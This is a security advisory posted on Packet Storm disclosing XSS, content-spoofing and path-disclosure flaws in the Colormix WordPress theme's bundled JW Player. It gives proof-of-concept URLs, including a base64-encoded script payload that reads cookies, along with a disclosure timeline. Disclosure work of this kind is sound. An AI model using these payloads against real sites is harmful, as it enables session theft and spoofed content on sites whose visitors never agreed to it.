exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Colormix XSS / Content Spoofing / Path Disclosure

WordPress Colormix XSS / Content Spoofing / Path Disclosure
Posted Apr 21, 2013
Authored by MustLive

WordPress Colormix theme suffers from cross site scripting, path disclosure, and content spoofing vulnerabilities.

tags | exploit, spoof, vulnerability, xss, file inclusion, info disclosure
SHA-256 | 1a6d8b2caf5b79f12115a437ecd623f9858b32df35626257b4cff71c1392af40

WordPress Colormix XSS / Content Spoofing / Path Disclosure

Change Mirror Download
Hello list!

Last year I've disclosed vulnerabilities in JW Player and in RokBox. Which
were fixed by the developers - JW Player developers fixed one hole and
promised to fix others later and RokBox fixed all holes (but it was
questionable how they fixed holes related to JW Player).

In December I've wrote about 47 RocketTheme's themes for WordPress (which
contain RokBox). Besides their themes I've found in December similar
vulnerabilities in multiple themes of other developers (including custom
themes).

Now I'll inform you about multiple vulnerabilities in Colormix theme for
WordPress. These are Cross-Site Scripting, Content Spoofing and Full path
disclosure vulnerabilities.

-------------------------
Affected products:
-------------------------

Affected all versions of Colormix theme for WordPress.

Other themes of this developer can be vulnerable as well.

-------------------------
Affected vendors:
-------------------------

Wordpress Themes Park
http://www.wordpressthemespark.com

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

There are FPD In folder http://site/wp-content/themes/colormix/ in index.php
and many other php-files of theme.

------------
Timeline:
------------

2012.05.29 - informed developers of JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists the first part of vulnerable themes by
RocketTheme for WordPress.
2012.12.30 - disclosed to the lists the second part of vulnerable themes by
RocketTheme for WordPress.
2013.04.18 - disclosed at my site about Colormix theme
(http://websecurity.com.ua/6457/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close